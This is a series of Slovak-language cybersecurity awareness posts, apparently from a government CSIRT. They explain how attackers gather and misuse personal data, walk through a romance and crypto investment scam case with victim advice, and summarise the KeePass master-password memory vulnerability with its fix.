Pomocou metódy web scrapingu dokáže útočník získať meno a priezvisko, dátum narodenia, miesto bydliska, emailovú adresu a podobne. Na základe zberu týchto osobných údajov, dokáže útočník vytvoriť falošný profil alebo emailovú správu a pokúsi sa získať ďalšie citlivé informácie, ako sú heslá alebo odpovede na otázky k obnoveniu hesla. Tým získa úplnú kontrolu nad účtom alebo zablokuje Váš prístup do Vášho profilu.

Krádež identity:

Každá zverejnená fotografia môže obsahovať metadáta, ktoré poskytujú informácie o mieste, kde bola fotografia zachytená. Útočník môže zneužiť tieto informácie na vytvorenie falošnej identity a dokumentovať presný pohyb obete. S týmito informáciami o polohe môže útočník vytvoriť vymyslený príbeh alebo identitu a tým zvýšiť dôveryhodnosť svojho príbehu.

Vydieranie a kyberšikana:

Útočník môže získať osobné údaje obete, vrátane jej fotografií a polohy miest, ktoré navštívila. Úspešné získanie informácií umožňuje vydierať alebo šikanovať obeť, napríklad vyhrážkami zverejnením citlivých fotografií alebo informácií na sociálnych sieťach.

Útok na firmy/organizácie:

Útočník môže vyhľadávať informácie o zamestnancoch a organizácii, vrátane ich fotografií na verejných profiloch (napríklad platforma LinkedIn). Tieto informácie dokáže zneužiť na vytvorenie falošnej identity, ktorú môže zneužiť na infiltráciu do organizácie za účelom získania citlivých vnútropodnikových informácií a špionáže.

Vlámanie:

Útočník by mohol vyhľadávať verejne dostupné informácie o bydlisku alebo pomocou GPS metadát z uverejnených fotografií na sociálnych sieťach. Môžu to byť informácie o adrese, veľkosti domu, plánovaných dovolenkách, naplánovanom programe v online kalendároch a iné. Na základe týchto informácií by útočník mohol vytvoriť falošný príbeh alebo vytvoriť dôveryhodný scenár, ktorý by mohol zneužiť pri plánovaní vlámania. Dokáže zistiť neprítomnosť majiteľov, čo by mu mohlo poskytnúť príležitosť na vlámanie.

Kombinácia osobných údajov:

Útočník môže zhromažďovať rôzne verejné údaje o obeti z rôznych zdrojov. Následne môže využiť tieto informácie na vytvorenie komplexného profilu obete a použiť ho na sofistikované útoky.

Časté príklady:

Veľmi častým príkladom môže byť telefonická komunikácia, kde sa útočník vydáva za príslušníka policajného zboru alebo analytika IT oddelenia v banke, na pošte a podobne. Primárnym nástrojom útočníka je sociálne inžinierstvo, kedy sa Vás snaží presvedčiť o zdieľaní citlivých údajov, autentifikačných dát, prípadne potvrdení notifikácie. Nikdy tieto informácie neprezrádzajte! Banka, pošta, kuriér alebo iné oficiálne inštitúcie nepotrebujú vedieť autentifikačné dáta, heslá alebo údaje z bankovej karty.

Ďalším príkladom môže byť nezodpovedné správanie zo strany obetí, napríklad keď sa pochvália novou bankovou kartou na sociálnych sieťach. Nikdy nezverejňujte fotografie svojich bankových údajov! Na obrázku môžeme vidieť zverejnenie prednej strany debetnej karty a po následnej interakcií ľudí v komentároch aj prezradenie CVV/CVC kódu.

Buďte obozretní pri zdieľaní osobných údajov online a chráňte svoje informácie! Dodržiavajte bezpečnostné opatrenia, aby Ste minimalizovali pravdepodobnosť zneužitia osobných údajov útočníkmi. Silné heslá, dvojfaktorová autentifikácia a opatrnosť pri zdieľaní osobných informácií online sú nevyhnutné pre zachovanie Vašej digitálnej bezpečnosti.

Buď múdrejší ako hacker- osobné údaje #2

Marian Danko — Thu, 12 Oct 2023 08:34:55 +0000

V dnešnej digitálnej dobe sú osobné údaje ohrozené viac ako kedykoľvek predtým. Kreativita útočníkov na získanie Vašich osobných údajov nemá hranice. Útočníci môžu použiť rôzne metódy na zbieranie osobných údajov svojich obetí, vrátane sociálneho inžinierstva, phishingových útokov alebo prehľadávanie otvorených zdrojov, ako napríklad fotografií na sociálnych sieťach…

Najbežnejšie metódy útočníkov:

Sociálne inžinierstvo: Zahŕňa manipuláciu obetí za účelom prezradenia ich citlivých informácií. Útočníci vykonávajú online prieskum aktivít svojich obetí a používajú informácie, ktoré nájdu, na získanie ich dôvery a na ich presvedčenie.

Reverzné sociálne inžinierstvo: Útočník vytvorí situáciu, pri ktorej obeť sama príde za útočníkom. Ide o sofistikovanú metódu psychickej manipulácie, pri ktorej útočník za použitia štandardných metód sociálneho inžinierstva uvedie obeť do omylu a presvedčí ju, že on je osoba z dôveryhodnej organizácie a iba on vie obeti pomôcť s jej problémom, ktorý rovnako vytvoril on. Viac informácií nájdete tu.

Taktika: Baiting, Pretexting, DNS spoofing, Scareware, Position of authority, Sense of urgency

Prevedenie: Mail, Smishing, Vishing, podvodná webstránka/aplikácia

Extrakcia metadát z fotografií:

Útočník dokáže získať rozličné dáta z fotografií, napr. EXIF, dátum a čas, GPS, popis fotky alebo autorské práva. Z fotografií vie útočník získať citlivé informácie o osobe, hlavne ak informujú o dennej rutine človeka, špeciálnych príležitostiach, alebo plánoch a úspechoch.

Web scraping:

Je proces získavania dát z webových stránok pomocou automatizovaných nástrojov alebo softvéru. Web scraping zo sociálnych sietí umožňuje útočníkom získať rôzne druhy údajov o používateľoch. Napríklad kontaktné informácie, súkromné správy, príspevky a komentáre, sledovanie používateľov alebo profilové informácie.

Obsah na sociálnych sieťach:

Útočník môže získať informácie o identite a polohe používateľa na základe jeho profilu na sociálnych sieťach. Používatelia často zdieľajú citlivé informácie, ako sú napríklad dátum narodenia, miesto narodenia, rodinný stav, zamestnanie a vzdelanie. Tieto informácie môžu byť použité na vytvorenie falošného profilu alebo na sledovanie používateľa.

Na obrázku nižšie môžeme vidieť príklad phishingového útoku, ktorý navádza obeť na stiahnutie hlasovej správy z aplikácie Outlook. V prvom rade si všimnime emailovú adresu, z ktorej nám prišiel email. Táto doména nepatrí spoločnosti Microsoft, čo si vieme overiť na ich oficiálnej stránke alebo pomocou webovej platformy who.is alebo centralops. Po presunutí kurzora na tento odkaz sa nám v ľavom spodnom rohu ukázala webová stránka, kam by sme boli presunutí po kliknutí na odkaz. Nikdy na takýto odkaz NEKLIKAJTE! Za druhé si treba skontrolovať, či vôbec aplikácia Outlook dovoľuje odosielanie hlasových správ, pričom po krátkom prieskume zistíme, že táto možnosť neexistuje. Dbajte na obsah emailu a informácie, ktoré sú v ňom zahnuté. V prípade úspešného presvedčenia obete by sa útočníkovi mohlo podariť získať od nej prihlasovacie údaje, finančné či osobné informácie alebo citlivé informácie, ktoré dokáže zneužiť.

Buďte opatrní voči žiadostiam o priateľstvo a správam od neznámych jednotlivcov. Používateľ sociálnych sietí by mal obmedziť množstvo zdieľaných osobných informácií. Okrem toho odporúčame skontrolovať nastavenie súkromia a upraviť ich tak, aby sa obmedzila viditeľnosť osobných údajov pre verejnosť. Je dôležité byť si týchto rizík vedomý a prijať kroky na svoju ochranu. Týmito opatreniami môžete chrániť samých seba a svojich najbližších pred útočníkmi, ktorí sa snažia zneužiť Vaše osobné údaje na útok proti Vám. INTERNET NEZABÚDA !!!

Budúci týždeň si bližšie predstavíme zneužitie osobných údajov, ktoré sa podarilo kyberútočníkom získať od svojich obetí. Sledujte naše stránky pre viac informácií.

Buď múdrejší ako hacker- osobné údaje

Marian Danko — Fri, 06 Oct 2023 08:33:22 +0000

V rámci každoročnej kampane Agentúry EÚ pre kybernetickú bezpečnosť (ENISA) sme pre Vás pripravili odporúčania ako „byť múdrejší ako hacker“. Každý týždeň počas októbra 2023 zverejníme tipy, rady a informácie, ktoré Vám pomôžu pri ochrane všetkých údajov, ktoré sú dôležité a mohli by byť zneužité proti Vám.

Bezpečnosť a ochrana osobných údajov má v súčasnosti zásadný význam. Tieto údaje sú neoddeliteľnou súčasťou našich životov, pretože nám umožňujú identifikáciu a prístup k rôznym službám a produktom. Avšak, súčasne predstavujú značné riziko pre našu bezpečnosť, keďže ich zneužitie môže mať vážne následky, ako napríklad krádež identity alebo finančné straty. V dobe, keď sa stále viac procesov presúva do online prostredia, je ochrana osobných údajov ešte dôležitejšia. Preto by sme mali byť obozretní pri zdieľaní citlivých informácií na internete. Osobné údaje sú cenným majetkom pre každého, ale aj pre útočníkov.

Existuje niekoľko dôvodov, prečo sú osobné informácie pre nás dôležité:

Krádež identity: Útočník môže zneužiť ukradnuté osobné údaje na získanie prístupu k bankovým účtom, kreditným kartám a iným finančným účtom. Tiež môže využiť ukradnuté údaje na získanie nových úverov alebo kreditných kariet v mene obete.

Phishing: Útočník môže zneužiť ukradnuté osobné údaje na vytvorenie falošných e-mailov alebo webových stránok, ktoré sa zdajú byť legitímne. Tieto e-maily alebo webové stránky môžu požadovať od obete ďalšie osobné údaje, ako sú heslá alebo citlivé bankové informácie.

Špionáž: Útočník môže zneužiť ukradnuté osobné údaje na sledovanie aktivity obete v digitálnom aj reálnom prostredí. Dokonca aj GPS dáta sú osobné údaje! Vďaka presnej polohe z GPS dát môže útočník sledovať obeť a monitorovať jej pohyb v reálnom čase. Tento druh sledovania umožňuje útočníkovi obťažovať obeť alebo sa vydávať za niekoho, kto je v jej blízkosti. Účelom tohto konania môže byť manipulácia s obeťou alebo získanie jej dôvery prostredníctvom vykonštruovaných príbehov a situácií.

Vydieranie: Útočník môže zneužiť ukradnuté osobné údaje na vydieranie obete. Napríklad môže hroziť zverejnením citlivých informácií, pokiaľ obeť nezaplatí výkupné.

Ohováranie: Zneužitie osobných údajov môže byť použité na ohováranie a diskreditáciu obete. Útočníci môžu vytvoriť atmosféru strachu a neistoty, keď využívajú ukradnuté údaje, čo môže postihnúť človeka ale aj organizácie a firmy.

Kyberšikana: Kyberšikana je vážnym problémom, ktorý môže mať pre obeť závažné následky. Prejavy kyberšikany môžu zahŕňať napríklad šírenie nepravdivých informácií o obeti, vydávanie sa za ňu.

Je kľúčové si uvedomiť, že správne zaobchádzanie s osobnými informáciami je zásadné pre ochranu súkromia a bezpečnosti jednotlivcov. Preto je nevyhnutné mať jasné pochopenie toho, ako ich správne chrániť a využívať, aby sme zabezpečili naše súkromie a bezpečnosť.

#CSIRTacik #BeSmarterThanaHacker #PrivacyMatters #SafeOnlineLife

Láska na dlh

Marian Danko — Thu, 07 Sep 2023 10:58:00 +0000

O tom, že je internet skvelý nástroj, nemusíme nikoho presviedčať. Prináša mnoho pozitív, ale zároveň aj riziká a negatíva, ako sú podvody. Dôsledkom pandémie COVID-19 sa v spoločnosti začal zvyšovať záujem o virtuálny svet. Následkom toho narástol počet používateľov na sociálnych sieťach, čo uľahčilo nadväzovanie kontaktov a vzťahov. Na základe vyššej aktivity používateľov v online priestore sa rozšíril aj počet možností podvodov cez internet. Používatelia dnes musia byť opatrnejší ako kedykoľvek predtým. Pomocou zoznamovacích aplikácií sa dokážu používatelia efektívnejšie, rýchlejšie a jednoduchšie zoznámiť s ďalšími ľuďmi. Na druhú stranu to vnáša možnosť aj pre útočníkov, aby dokázali svoje potencionálne obete rýchlejšie vyhľadať a nadviazať s nimi kontakt. A tak sú používatelia vystavení rizikám podvodov, ako napríklad krádež identity, podvodné online obchody, investičné podvody, falošné pokuty, falošné súťaže, romantické podvody…

Romantické podvody patria medzi obľúbené a pravidelné útoky podvodníkov. Tento typ podvodu umožňuje podvodníkom získať dlhodobý prijem, plynúci z vybudovaného falošného vzťahu s obeťou. Špeciálne pripravený profil, napríklad atraktívnej ženy, ktorá má podobné záujmy, problémy, či názory ako obeť, sa využíva v značnej miere na manipuláciu a odcudzenie finančných prostriedkov obete. Zoznamovacie aplikácie slúžia podvodníkom ako veľmi účinný nástroj na efektívne a rýchle nadviazanie kontaktu so svojou obeťou. Je dôležité poznamenať, že podvodníci, ktorí sa špecializujú na romantické podvody, sú majstri v umení sociálneho inžinierstva. Tí, ktorí vykonávajú romantické podvody sa snažia nadobudnúť dojem autentickej osoby, ktorá je starostlivá a dôveryhodná. Snahou je získať si pozornosť a náklonnosť potencionálnej obete, čo sa im môže podariť aj na základe informácií získaných z profilu a aktivít na sociálnych sieťach. Po tom čo si podvodník získa dôveru svojej obete na spoločných sociálnych témach, prechádza do štádia finančného podvodu. Vo väčšine prípadov sa jedná o spreneverenie peňažných prostriedkov obete. V priebehu komunikácie s obeťou môžu podvodníci používať rôzne metódy, ako napríklad nečakané zdravotné problémy, právne záležitosti, naliehavú potrebu finančných prostriedkov, či vidinu neodolateľnej investície. Títo podvodníci dokážu excelentne manipulovať s emóciami a snažia sa obeť presvedčiť, že takéto platby sú potrebné na vybudovanie dôvery, vyriešenie krízových situácií alebo dokonca na vytvorenie spoločných plánov do budúcnosti. Spomínané dôvody majú v obeti vyvolať pocit, že platby sú nevyhnutné. Zároveň používajú psychologické taktiky, ako je vyvolanie pocitu vďačnosti za pozornosť a pomoc, ktorú útočník poskytuje obeti. To môže spôsobiť, že obeť bude mať sklon vyhovieť ďalším požiadavkám útočníka, aby si udržala tento virtuálny vzťah. Jedným z dôležitých faktorov, pomocou ktorých útočníci dosahujú svoje ciele, je schopnosť vložiť do vzťahu rôzne dôvody, prečo obeť musí posielať opakované platby. Akonáhle podvodník dosiahne prvú platbu od obete, môže ju začať považovať za “pripravenú” a zraniteľnejšiu voči ďalšej manipulácii. Tým sa prehlbuje vzťah medzi podvodníkom a obeťou, čo následne povzbudzuje obeť k ďalším platbám a účasti na pochybných finančných transakciách. Je dôležité poznamenať, že osoby, ktoré sa stanú obeťami romantických podvodov, často prechádzajú zložitými emocionálnymi stavmi, kedy sa môžu cítiť osamelé, túžiace po láske a pozornosti. Tieto emócie zneužívajú podvodníci tak, aby jednoduchšie dosiahli svoj cieľ.

Podobné podvody neobchádzajú ani občanov Slovenskej republiky. Vládna jednotka CSIRT je oboznámená bezpečnostným incidentom, ktorý prišiel s veľmi sofistikovanou stratégiou. Zdanlivo nevinná zoznamovacia aplikácia Tinder bola bránou, prostredníctvom ktorej sa dokázal útočník nakontaktovať na svoju obeť. Následne útočník požadoval presunutie konverzácie do aplikácie WhatsApp. V priebehu pravidelnej dvojmesačnej komunikácie sa útočníkovi podarilo nadviazať plnohodnotný virtuálny vzťah s obeťou. Na základe informácií o obeti z verejne dostupných zdrojov dokázal útočník rýchlejšie otvoriť spoločné témy, nadviazať na problémy, koníčky a názory. Vzťah, ktorý dosiahol určitú úroveň dôvery, prešiel k téme financií. V tomto momente už obeť považovala útočníka za blízku osobu. Útočník zneužil popularitu kryptomien a predstavil tento svet ako jedinečnú investičnú príležitosť. Obeť sa rozhodla investovať do sveta kryptoaktív, na základe odporúčania a prezentovaných osobných skúseností útočníka, cez podvodnú platformu. Obeti podvodu vznikla škoda v investovanej čiastke 99 001 amerických dolárov pomocou digitálnej meny USDT (Tether, stablecoin). Obeť si dokonca požičala finančné prostriedky na realizáciu tejto investície od svojho blízkeho okolia a rodiny. Útočník dokázal presvedčiť obeť na celkovo 14 platieb prostredníctvom podvodnej platformy https://www.bitokc.com/. Výhodou spomenutej platformy pre podvodníka je, že nie je možné dohľadanie identity majiteľov alebo prevádzkovateľov webovej stránky. Po zistení, že sa jedná o podvod, sa obeť snažila získať svoje finančné prostriedky od útočníka naspäť. Snaha zvrátiť platby na podvodnej platforme nebola úspešná a falošný profil s menom Tiffany dokonca začal hovoriť o pocite viny. Podvodná platforma Bitokc má pravdepodobne získať dojem relevantnosti a serióznosti falšovaním reálnej spoločnosti, BitOK. Izraelská IT firma, BitOK, bola založená v roku 2021 a podľa dostupných informácií vyvíja vlastný softvér na monitorovanie investičného portfólia.

(Obr. č. 1 Falošný profil s menom Tiffany hovorí o pocite viny )

Keďže sa nejedná o ojedinelý prípad, obeť bola kontaktovaná spoločnosťou Cipher Ops vo veci prebiehajúceho podvodu, kde boli rozpoznané viaceré obdobné prevody na softvérovú peňaženku. Spoločnosti Cipher ops sa podarilo vysledovať finančné prostriedky cez viacero peňaženiek na sieti ETH (Ethereum) až na koncový účet, ktorý je vedený na kryptomenovej burze Binance. Útočník si vybral najväčšiu kryptomenovú burzu, Binance, pravdepodobne, kvôli veľmi dobrej povesti a úrovni zabezpečenia. Nevýhodou pre útočníka je KYC overenie identity, kde musí pri registrácií zadať občiansky preukaz. Bez overenia identity nie je schopný vybrať finančné prostriedky z burzy. Útočník pravdepodobne použil údaje nastrčenej osoby. Prostredníctvom forenznej analýzy spoločnosť identifikovala a sledovala adresy kryptomenových peňaženiek cez transakcie, až kým neidentifikovala transakciu, ktorá zahŕňa peňaženku vlastnenú poskytovateľom služieb virtuálnych aktív (VASP). Identifikovať majiteľa adresy kryptomenovej peňaženky, ktorá bola zneužitá na prevod z kryptomien do fiat meny, dokáže spoločnosť len na základe dopytu orgánov činných v trestnom konaní. Na Slovensku patrí k takýmto kompetentným orgánom odbor počítačovej kriminality, Národnej centrály osobitných druhov kriminality na Prezídiu Policajného zboru Slovenskej Republiky . V tomto prípade má burza Binance právo na základe dopytu orgánov činných v trestnom konaní sprístupniť overenie totožnosti klienta (KYC), ktorý je majiteľom peňaženky. Bližšie informácie o sledovaní softvérových peňaženiek nájdete na stránke- https://www.coingecko.com/learn/crypto-wallet-tracking.

(Obrázok č. 2 Sledovanie prevodu kryptoaktív cez softvérové peňaženky na ethereovej sieti, až na koncovú peňaženku útočníka)

Cipher Ops zistila, že podvodníci presunuli finančné prostriedky obete (resp. aj iných obetí) na koncový účet, ktorý mali vedený spoločnosťou Binance. Obeť preto v tejto veci kontaktovala spoločnosť Binance, ktorá taktiež vyhodnotila, že opisované transakcie sú podozrivé. Uviedla, že na to aby v tejto veci mohla konať, je potrebné, aby ju kontaktovali orgány činné v trestnom konaní prostredníctvom legitímneho webového formulára https://app.kodexglobal.com/binance/signup. Kryptomenová burza Binance ponúka technickú podporu pre svojich používateľov aj na Slovensku a v Čechách. Komunikácia s technickou podporou plní svoj účel a používateľ by sa na ňu mal obrátiť vždy, ak nastane jeden zo spomenutých problémov, neautorizovaná transakcia, zablokovaný účet, problém s vkladom alebo overením účtu. Aktuálny zostatok na spomínanej peňaženke zapojenej do opisovaného podvodu je v čase prípravy tohto článku už 1,3 milióna dolárov v digitálnej mene USDT (Tether).

(Obrázok č. 3 Komunikácia obete s automatizovanou podporou spoločnosti Binance)

Odporúčania

1. Ak máte podozrenie, že ste sa stali obeťou romantického podvodu alebo iného typu podvodu, mali by ste sa obrátiť na príslušné orgány činné v trestnom konaní a vyhľadať pomoc odborníkov vo firmách zameraných na podvody.

2. Pri používaní zoznamovacích aplikácií nezabúdajte na opatrnosť a zachovajte si zdravú dávku skepticizmu, aby ste minimalizovali riziká. Podvody nás varuje pred temnými stránkami virtuálneho sveta, kde útočníci majú podobu falošných charizmatických tvárí, schopných získať si dôveru a zároveň zneužiť emócie svojich obetí vo svoj prospech, alebo obohatenie sa.

3. Na neznámych webových stránkach a neznámym ľudom nikdy nezadávajte osobné údaje, ako sú heslá, čísla kreditných kariet, rodné číslo, dátum narodenia, adresa trvalého pobytu.

4. Dávajte si pozor na podozrivé ponuky pri sľuboch vysokých ziskov s minimálnym rizikom. Každá investícia nesie určité riziko, preto je dôležité, aby ste boli realistickí, pokiaľ ide o potenciálne výnosy. Uistite sa, že je finančná služba riadne zaregistrovaná a licencovaná príslušnými finančnými orgánmi a má dobrú povesť medzi investormi.

5. Pred nákupom tovarov alebo služieb od neznámych predajcov si overte ich dôveryhodnosť a prečítajte si recenzie od iných zákazníkov.

6. Používajte bezpečné spôsoby online platieb, napríklad overené platobné brány a vyhýbajte sa nezabezpečeným spôsobom platieb.

7. Buďte opatrní pri klikaní na odkazy v e-mailoch alebo správach. Môžu viesť na falošné webové stránky, ktoré sa snažia získať vaše údaje. Využívajte prepojenia len cez oficiálne webové stránky alebo zadávajte odkaz na webovú stránku manuálne do prehliadača.

8. Nepodliehajte tlaku na rýchle rozhodnutie. Seriózne investičné príležitosti vám poskytnú dostatok času na vykonanie prieskumu, zváženie možností investovania.

9. Dbajte na svoju kybernetickú bezpečnosť. Na prístup k investičným účtom používajte silné heslá a dvojfaktorovú autentifikáciu a vyhýbajte sa zdieľaniu citlivých údajov prostredníctvom nezabezpečených kanálov.

10. Investujte len peniaze, ktoré si môžete dovoliť stratiť. Nikdy neinvestujte peniaze určené na základné životné náklady, úspory alebo peniaze, ktoré ste si požičali. Pred každou investíciou buďte opatrní a riadne zvážte svoju finančnú situáciu.

Zdroj:

https://www.fbi.gov/how-we-can-help-you/safety-resources/scams-and-safety/common-scams-and-crimes/romance-scams

https://www.coingecko.com/learn/crypto-wallet-tracking

https://www.linkedin.com/pulse/reported-crypto-investment-websites-2023-rodney-wilhelm/

Zraniteľnosť KeePass umožňuje získať hlavné heslo z pamäte

Marian Danko — Wed, 14 Jun 2023 08:27:11 +0000

Spoločnosť KeePass vydala verziu KeePass 2.54, ktorá opravuje kritickú zraniteľnosť ohrozujúcu bezpečnosť citlivých dát používateľov aplikácie. Útočník má možnosť získať dáta z neošetreného textového poľa „SecureTextBoxEx“, ktoré sa používa pre zadávanie hlavného hesla, ako aj pre úpravu hesiel. Zneužitie predmetnej zraniteľnosti umožňuje útočníkovi extrahovať citlivé údaje z výpisu pamäte aplikácie.

Zraniteľné systémy:

KeePass 2.x < 2.54

Opis činnosti:

KeePass je bezplatný, open-source software určený pre bezpečné spravovanie hesiel. Slúži ako digitálny trezor, v ktorom môžu užívatelia ukladať svoje citlivé informácie. KeePass šifruje dáta pomocou hlavného kľúča alebo hlavného hesla, ktoré je potrebné zadať pre prístup k uloženým informáciám.

CVE-2023-32784 (CVSS skóre 7,5)

Zraniteľnosť sa nachádza v textovom poli SecureTextBoxEx. Toto pole je používané v rôznych častiach aplikácie, ale aj na zadávanie hlavného hesla. Na základe spôsobu, akým služba .NET CLR prideľuje reťazce, by mali byť vstupy pravdepodobne usporiadané v pamäti. Útočník môže získať heslo, len ak bolo vložené pomocou klávesnice a nie pomocou kopírovania zo schránky. Najnovšia verzia populárneho správcu hesiel využíva Windows API k manipulácii s dátami z textových polí, čo účinne zabraňuje vytvoreniu spravovaných reťazcov, ktoré by mohli byť extrahované z výpisu pamäte. Zraniteľnosť je možné zneužiť iba lokálne.

Zraniteľnosť objavil bezpečnostný výskumník so pseudonymom vdohney, ktorý publikoval a ukážku jej zneužitia.

Závažnosť zraniteľnosti: Vysoká

Možné škody:

Únik citlivých informácií

Odporúčania:

Odporúčame bezodkladnú aktualizáciu systému KeePass. Používateľom, ktorí dlhšie používali KeePass a ich heslá mohli byť uložené do hibernačných a swapových súborov, sa odporúča zmeniť svoje hlavné heslo, zmazať hibernačné a swapové súbory, ktoré mohli obsahovať fragmenty hlavného hesla, alebo vykonať čistú inštaláciu operačného systému.

KeePass 1.x, Strongboxu alebo KeePassXC nie sú zasiahnuté touto zraniteľnosťou.

Odkazy:

https://www.bleepingcomputer.com/news/security/keepass-v254-fixes-bug-that-leaked-cleartext-master-password/

https://securityaffairs.com/146404/hacking/keepass-2-x-master-password-dumper.html

https://keepass.info/news/n230603_2.54.html